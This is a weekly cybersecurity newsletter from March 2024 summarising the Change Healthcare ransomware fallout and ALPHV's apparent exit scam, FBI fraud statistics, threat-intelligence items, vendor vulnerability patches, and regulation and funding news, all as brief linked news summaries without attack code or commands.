Robin’s Newsletter #299

10 March 2024. Volume 7, Issue 10
ALPHV pulls an exit scam after Change Healthcare seems to make ransom payment.
Join hundreds of subscribers who get this first, every Sunday. Subscribe

This week

Change Healthcare restoration continues as BlackCat closes up shop, absconds with ransom payment

  • Change Healthcare, the UnitedHealth Group subsidiary victimised by the ALPV/BlackCat ransomware gang, recovered some of its systems this week. The company’s electronic prescription systems, used by pharmacies across the US, are “now fully functional”. The outage has been disruptive for small and medium-sized pharmacies that rely on the systems to file and receive insurance payments, leaving some pharmacies facing cash flow problems.
  • The restoration may have been in part because critical data was able to be retrieved after reports surfaced of an alleged $22 million ransom payment having been made. UnitedHealth has declined to comment on the reports. LINK
  • Meanwhile, the ALPHV/BlackCat ransomware gang shut down its servers this week and replaced its dark web site with what appeared to be an FBI seizure notice. However, the National Crime Agency, quoted on the seizure notice, says it wasn’t involved with the takedown, leading to speculation that the cybercriminals had engaged in an exit scam and made off with the proceeds. LINK
  • That claim appears to be backed up by a post on a crime forum from a user claiming to be the ALPHV affiliate responsible for the attack but claiming that the ransomware group has disabled their accounts and made off with the money without paying them. There’s no honour amongst thieves, eh? LINK
  • It’s reignited discussions about banning ransomware payments within the information security community. Carly Page has a piece on the complexities of this potential policy. Ransomware as a crime category exploits the proximity afforded by modern computer networks with the distance of traditional extradition treaties. The key players are known to law enforcement, but the lack of extradition treaties makes pursuing them through traditional channels difficult. LINK

Interesting stats

Ransomware dominates the headlines but pales when it comes to financial losses… $12.5 billion (up 22%) in online fraud reported to the FBI in 2023, including $2.9 billion (21,489 complaints) associated with Business Email Compromise (BEC) scams, $744.2 million (55,851 complaints) with personal data breaches, $59.6 million (2,825 complaints) to ransomware. 2023 Internet Crime Report (PDF)

Other newsy bits / in brief

  • A taxonomy on large language model (LLM) prompt injection attacks in the paper Ignore This title and HackAPrompt. These prompts help to escape restrictions placed on generative AI tools like ChatGPT. LINK

A Taxonomical Ontology of Prompt Hacking Techniques. (Source: Schulhoff et al)

  • Microsoft says that password-spraying attacks by the APT29 (aka Cozy Bear) group have increased tenfold. In a blog post, the company says that the Russian intelligence operation “is using information initially exfiltrated from our corporate email systems” to gain unauthorised access to “some of the company’s source code repositories and internal systems”. LINK

⚠️ Incidents:

  • Russia released an intercepted recording of a German military conference call discussing the supply of cruise missiles to Ukraine. The call was obtained from a Webex conference call, where one of the senior officials was dialling in by phone from a hotel in Singapore during a defence conference. So less German (or Webex) security is bad, more old-fashioned call interception. LINK
  • American Express is warning customers that their payment card details may have been compromised after a breach at a merchant processor. “American Express owned or controlled systems were not compromised by this incident,” the company said in the breach notification, “we are providing this notice to you as a precautionary measure.” We may see more announcements in the coming days because the breach occurred at a “service provider engaged by numerous merchants”. LINK
  • Ukraine claims to have compromised Russian defence ministry servers. LINK
  • A “cyber incident” forced Canada’s anti-financial crime agency — the Financial Transactions and Reports Analysis Centre of Canada (FINTRAC) — to take its corporate systems offline. Intelligence and classified systems were not accessed or affected. LINK

🏴‍☠️ Ransomware:

  • “We have more than enough beer in stock”: Belgian brewery Duvel halted production after detecting ransomware on its network. LINK

🕵️ Threat Intel:

  • TA577, an initial access broker associated with Qbot and Black Basta ransomware, has shifted tactics and begun trying to steal NT LAN Manager (NTLM) hashes used by Windows systems to authenticate. The technique is to email a ZIP file containing an HTML file that redirects using the file:// protocol to a remote SMB server. (A ZIP is needed to create a local file, as the file:// protocol would be blocked directly in emails). LINK
  • Analysis of stealthy GPTDOOR malware that may be linked to UNC1945/LightBasin, a suspected Chinese intelligence operation targeting global telcos. LINK

🪲 Vulnerabilities:

  • VMware has released patches for all versions of its ESXi, Workstation, Fusion, and Cloud Foundation products — including those that are unsupported/end of life — because of four vulnerabilities that allow attackers to break out of the virtual machine sandbox and hypervisor protections. CVE-2024-22252, CVE-2024-22253, CVE-2024-22254, CVE-2024-22255 score unto 9.3/10. The vendor says it isn’t aware of any evidence that the vulnerabilities are being actively exploited, though the high profile of the release suggests it may not stay that way for long. LINK, ADVISORY
  • JetBrains is warning users of its on-premise TeamCity continuous integration (CI/CD) product to patch two vulnerabilities urgently. Version 023.11.4 fixes CVE-2024-27198 (9.8/10) and CVE-2024-27199 (7.3), allowing a remote attacker to bypass authentication checks and take administrative control of the server. LINK, ADVISORY
  • QNAP has fixed a critical authentication bypass in its QNAP network attached storage (NAS) products (CVE-2024-21899, CVE-2024-21900, and CVE-2024-21901). LINK, ADVISORY
  • North Korea’s Lazarus group exploited Windows 0-day for six months after Microsoft knew of it to install the ‘FudModule’ rootkit. CVE-2024-21338 (7.8/10) is an ‘admin-to-kernel’ issue, and Microsoft does not consider this a security boundary, which may be why it took time to address. LINK, ADVISORY
  • Apple fixed two 0-day iOS vulnerabilities that had been exploited in the wild. CVE-2024-23225 (7.8/10) and CVE-2024-23296, in the IOS Kernel and RTKit, respectively, allowed an attacker to bypass kernel memory protections. While these had been exploited in the wild, they were likely being used by intelligence agencies or spyware operators to compromise devices of high-value targets rather than wide exploitation against most users. LINK, ADVISORY

🧰 Guidance and tools:

  • Microsoft has made updates to its Security Development Lifecycle (SDL). First published 20 years ago, these updates are around “continuous SDL” to reflect cloud and CI/CD practices and emphasise data and evidence. It’s a useful reference for engineering teams seeking inspiration for their own SDLC practices. LINK
  • NSA and CISA have published practices for securing cloud services, including cloud identity, key management, network segmentation, data security and risk management of service providers. LINK

📜 Regulation:

  • An industry-led advisory group to the White House says market forces are ‘insufficient’ and more economic incentives are needed to get critical infrastructure operators to raise their cyber security game to the levels needed to protect national security. Industry telling the government it needs more money to do what the government wants it to do is hardly unusual. However, it’s not surprising that private companies do not consider the full extent of public impacts. LINK

👮 Law Enforcement:

  • Law enforcement doesn’t want to be “customer service” reps for Meta any more, as Instagram and Facebook account takeover complaints soar. LINK
  • The US National Guard airman, Jack Teixeira, who had been leaking classified information (vol. 6, iss. 16) on Discord to impress his friends, has pleaded guilty. LINK

💰 Investments, mergers and acquisitions:

  • Axonius has raised $200 million to expand its asset management platform. LINK
  • Paris-based homomorphic encryption outfit Zama has raised a $73 million Series A funding round. LINK
Robin

  Robin's Newsletter - Volume 7

  ALPHV/Blackcat Change Healthcare UnitedHealth Group Ransomware Cybercrime Exit scam Internet Crime Report Large language model (LLM) Generative AI (GenAI) Artificial Intelligence (AI) Prompt injection Cisco WebEx JetBrains SDLC